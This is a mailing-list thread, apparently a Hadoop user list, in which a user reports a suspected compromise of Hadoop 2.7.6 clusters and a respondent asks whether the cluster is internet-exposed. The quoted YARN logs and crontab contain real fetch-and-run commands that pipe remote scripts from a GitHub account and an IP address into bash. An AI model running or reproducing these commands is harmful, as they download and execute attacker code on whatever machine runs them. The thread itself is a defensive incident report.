Is this cluster open to internet? we've seen few clusters which are open to internet are affected to this attack.
On Thu, Jul 5, 2018 at 8:32 PM Cliff Mattern < clifford.matt...@alphacarina.de> wrote: > Dear all, > > we downloaded > http://www.apache.org/dyn/closer.cgi/hadoop/common/hadoop-2.7.6/hadoop-2.7.6.tar.gz > and install the unpacked files as described. The md5 check was correct. > After few days we found in the log files of YARN following entries: > > 2018-06-29 05:37:21,490 INFO > org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command > to launch container container_1530169168373_1580_01_000001 : wget -q -O - > https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh | bash > ... > 2018-06-29 05:39:54,152 INFO > org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command > to launch container container_1530169168373_1583_01_000001 : wget -q -O - > https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh | bash & disown > > In the crontab we found following single entry: > * * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1 > > We installed hadoop 2.7.6 on two seperate machines and get the same > behaviour. This all looks like a trojaner is working. What do you say to this > issue? > > > Mit freundlichen Grüßen / Kind regards, > Cliff Mattern > > -- > Clifford Mattern > AlphaCarina Software GmbH > Taunusturm 18.OG > Taunustor 1 > 60310 Frankfurt am Main > > Tel.: +49 (0)69 24 43 42-4395 > Fax: +49 (0)69 24 43 42-4150 > > e-Mail: clifford.matt...@alphacarina.de > Internet: https://alphacarina.de/ > > HRB Nr. 2339 • Handelsregister Deggendorf > Geschäftsführer: Dipl.-Inf. Stephan Iglhaut > > -- * Regards* * Sandeep Nemuri*
